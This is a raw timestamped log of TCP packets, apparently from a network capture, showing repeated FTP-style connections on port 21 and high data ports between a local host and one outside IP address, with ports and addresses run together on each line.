                                                                                                          Nov 4, 2024 21:26:57.433557034 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.433571100 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.433619976 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.433686972 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.433820009 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.434087038 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.434191942 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.438599110 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.438762903 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.438987017 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.439068079 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.439088106 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.439261913 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.439929008 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.441179037 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.494576931 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:58.176453114 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:58.289685011 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:02.209230900 CET5002921192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:02.214783907 CET2150029110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:02.214869976 CET5002921192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:02.215329885 CET5002921192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:02.220307112 CET2150029110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:02.220367908 CET5002921192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:10.904073954 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:10.909151077 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:11.253354073 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:11.253901958 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:11.258809090 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:11.262634993 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:11.262636900 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:11.267632008 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.201129913 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.201467991 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.206707954 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206768036 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206778049 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206788063 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206809998 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206820965 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206820011 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.206831932 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206841946 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206845999 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.206856012 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206898928 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.206935883 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.207055092 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.207094908 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.211889982 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.211941957 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.211951971 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.211952925 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.211962938 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.211971998 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.211991072 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.212028027 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.212078094 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.212086916 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.212126017 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.212162971 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.212271929 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.212330103 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.217722893 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.218266010 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.219208002 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.219332933 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.289716959 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.980257988 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:13.180394888 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.153726101 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.160250902 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:19.517566919 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:19.518552065 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.523463964 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:19.523608923 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.523673058 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.528733015 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:19.845097065 CET5003221192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.850440025 CET2150032110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:19.852694035 CET5003221192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.856864929 CET5003221192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.861867905 CET2150032110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:19.864717007 CET5003221192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.061707973 CET5003321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.067055941 CET2150033110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.067130089 CET5003321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.067466021 CET5003321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.072511911 CET2150033110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.072571039 CET5003321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.464711905 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.464972973 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.470247984 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470261097 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470273972 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470283985 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470313072 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.470336914 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.470367908 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.470635891 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470647097 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470657110 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470669031 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470683098 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470685959 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.470693111 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470721006 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.470750093 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.475291014 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.475318909 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.475339890 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.367561102 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.367568970 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.367589951 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.367613077 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.367750883 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.367760897 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.367788076 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.367820978 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.367981911 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.368024111 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.368037939 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.368088007 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.368314981 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.368359089 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.368406057 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.368416071 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.368455887 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.368490934 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.372509956 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373363018 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373449087 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373459101 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373500109 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373509884 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373562098 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373610020 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373620033 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373630047 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.379014969 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.381572008 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.381622076 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.492906094 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:01.145380974 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:01.290642023 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:05.200150967 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:05.205251932 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:05.549232960 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:05.551028013 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:05.555936098 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:05.558631897 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:05.558703899 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:05.564135075 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.484287024 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.484582901 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.489415884 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489437103 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489445925 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489490986 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.489527941 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489537001 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489541054 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489550114 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489566088 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.489603996 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.489609957 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489624023 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489645958 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489720106 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.494473934 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494529009 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494560957 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.494587898 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494597912 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494606972 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.494628906 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494677067 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.494714022 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.494724989 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494887114 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494956017 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494973898 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494988918 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.495007992 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.495058060 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.495496035 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499474049 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499522924 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499543905 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499556065 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499680996 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499825954 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499887943 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499897003 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500056028 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500138998 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500147104 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500154972 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500173092 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500181913 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500190973 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500255108 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500263929 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500272989 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500281096 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.501059055 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.501281977 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.682585001 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:07.280531883 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:07.492934942 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:17.310868025 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:17.316135883 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:17.316214085 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:18.235924006 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:18.236058950 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:18.241478920 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:18.579554081 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:18.579694033 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:18.584517956 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:18.950798035 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:18.950944901 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:18.955909014 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:19.295345068 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:19.295480967 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:19.300924063 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:19.654599905 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:19.654776096 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:19.659710884 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:19.997891903 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:19.998037100 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:20.003582001 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:20.341048002 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:20.341597080 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:20.347496986 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:20.347573042 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:20.347642899 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:20.352833986 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.256980896 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.264699936 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.269654989 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269701004 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269718885 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269730091 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269738913 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269877911 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.269889116 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269900084 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269908905 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269926071 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269929886 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.269948006 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.270123959 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.270158052 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.270220041 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.275044918 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275055885 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275094032 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275103092 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275192976 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275245905 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.275300026 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275310040 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275516033 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275527000 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275535107 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275578976 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.275639057 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.275664091 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.280143023 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.280452013 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.280668974 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.280786037 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.816854000 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.993005991 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:52.232244968 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:52.238329887 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:52.571675062 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:52.577948093 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:52.581541061 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:52.586884022 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:52.587097883 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:52.588850021 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:52.594065905 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:52.789918900 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.481708050 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.481980085 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.487047911 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487073898 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487096071 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.487122059 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.487138987 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487149000 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487159014 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487176895 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.487199068 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.487323999 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487334013 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487343073 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487353086 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487368107 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.487399101 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.487413883 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487462044 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.492099047 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.492139101 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.492172003 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.492182970 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.492206097 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.492213964 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.492216110 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.492225885 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.492233038 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.492247105 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.492268085 CET5004660363192.168.2.4110.4.45.197
